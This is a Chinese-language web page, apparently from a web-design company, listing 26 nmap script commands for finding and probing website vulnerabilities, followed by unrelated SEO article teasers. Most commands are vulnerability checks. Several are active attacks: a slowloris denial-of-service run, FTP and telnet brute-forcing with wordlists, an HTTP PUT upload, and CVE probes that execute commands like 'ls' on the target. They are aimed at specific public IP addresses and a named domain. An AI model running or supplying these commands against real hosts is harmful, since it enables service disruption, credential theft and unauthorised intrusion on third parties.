用nmap掃描網站漏洞的命令有:
1 http 拒絕服務
nmap –max-parallelism 800–script http-slowloris scanme.nmap.org
2.IIS 短文件泄露
nmap -p 8080 –script http-iis-short-name-brute 61.142.64.176
3.ftp弱口令暴力破解
nmap –script ftp-brute –script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153
4.檢測CVE-2011-2523中的ftp-vsftpd-backdoor
nmap -T2 –script ftp-vsftpd-backdoor 211.139.201.240
5.驗證http中開啟的-methods 方法
nmap -T3 –script http-methods –script-args http.test-all=true,http.url-path=/www.haoshangjia.com
6.驗證HTTP.sys 遠程代碼執行
nmap -sV –script http-vuln-cve2015-1635 203.195.139.153
7.驗證 SSL POODLE information leak
nmap -sV -p 443 –version-light –script ssl-poodle 218.19.141.16
8.驗證http 中開啟了put 方法
nmap –script http-put –script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16
9.驗證MySQL 匿名訪問
nmap –script mysql-empty-password 203.195.139.153
10.驗證cve2015-1427 漏洞
nmap –script http-vuln-cve2015-1427 –script-args command=ls 203.195.139.153
11.驗證cve2014-8877漏洞
nmap -Pn –script http-vuln-cve2014-8877 –script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/wordpress 42.96.170.128
12.驗證Cisco ASA中的CVE-2014-2126,CVE-2014-2127,CVE-2014-21,CVE-2014-2129漏洞
nmap -p 443 –script http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129 203.195.139.153
13.驗證低安全的 SSHv1,sslv2協議
nmap –script sshv1,sslv2 www.haoshangjia.com
14.驗證CVE-2014-0224 ssl-ccs-injection
nmap -Pn –script ssl-ccs-injection 203.195.139.153
15.驗證ssl-cert證書問題
nmap -v -v –script ssl-cert 203.195.139.153
16.驗證SSL證書的有限期
nmap -Pn –script ssl-date www.haoshangjia.com
17.驗證CVE-2014-0160 OpenSSL Heartbleed bug
nmap -p 443 –script ssl-heartbleed,ssl-known-key 203.195.139.153
18.驗證 Debian OpenSSL keys
nmap -p 443 –script ssl-known-key 203.195.139.153
19.驗證弱加密SSL套件
nmap –script ssl-enum-ciphers 203.195.139.153
20.驗證CVE 2015-4000
nmap –script ssl-dh-params www.haoshangjia.com
21.驗證多種SSL漏洞問題
nmap 203.195.139.153 –vv –script sshv1,ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed,ssl-known-key,sslv2
22.在網絡中檢測某主機是否存在竊聽他人流量
nmap –script sniffer-detect 10.10.167.5
23.暴力破解telnet
nmap -p 23 –script telnet-brute –script-args userdb=myusers.lst,passdb=mypwds.lst –script-args telnet-brute.timeout=8s 203.195.139.153
24.驗證telnet是否支持加密
nmap –script telnet-encryption 203.195.139.153
25.精準地確認端口上運行的服務
nmap -sV –script unusual-port 42.96.170.128
26.收集VNC信息
nmap –script vnc-info 203.195.139.153
本文由 貴州做網站公司 整理發布,部分圖文來源于互聯網,如有侵權,請聯系我們刪除,謝謝!
1、根據行業確定網站布局 網站的布局往往是檢驗一個網站是否合格的標準,合理的網站布局不僅可以突出主題,而且可以有效的提高用戶體驗度??蛻舸蜷_網站的第一眼基...
什么是營銷網站? 營銷網站沒那么難了解。簡單來說,就是把營銷的思緒、辦法、技巧融入到網站的籌劃、設計、制造中。營銷網站的目的是協助企業免費取得銷售道路或直...
對于每一個SEO站長來說,都希望自己所發布的每一篇文章內容都能夠被搜索引擎抓取、收錄、參與排名;但是有很多SEO站長的網站上線了一個月甚至好幾個月了,網站只...
??說到網站,我相信大家都并不陌生,在這個互聯網飛速發展的時代,很多年輕人都想建立自己的網站,那么,怎樣自己創建網站成為了大家都想知道的問題,那下面就讓貴州做網站公司小編詳細的為你們說一下吧,希望大家看完本文都能自己動手搭建屬于自己的網站。 ??怎樣自己創建網站 ??1.你需要一個域名,域名就相當于手機號碼,沒有域名只能輸入IP訪問,我相信訪客都不愿意吧!你可以去貴州做網站公司注冊個域名。 ...
對于站長來說,最怕的就是網站內容沒有收錄,辛苦做起來的排名下降。任何一個網站想要有個不錯的點擊量,就需要不斷進行優化改造,我們常見的就是SEO優化,主要有關鍵詞優化、黑帽白帽、外鏈等措施。網站排名在搜索引擎中比較靠前,就有利于用戶點擊,增加客流量,從而增加網站的權重。有些站長會發現有時候網站首頁會被k,導致網站無法瀏覽,無法搜索,下面貴州做網站公司就和大家說下網站首頁被k有...
??看到這個英文單詞,可能很多人會問,ASP是什么?ASP空間又是什么,這個ASP要怎么來定義,它有什么特點,它的主要功能又有哪些?接下來,就由貴州做網站公司的小編就什么是ASP空間,以及它的特點和功能,來詳細的為大家做個介紹。 ??什么是ASP? ??ASP是Active Server Page的縮寫,意為“動態服務器頁面”。ASP是微軟公司開發的代替CGI腳本程序的一種應用,它可以與數據庫...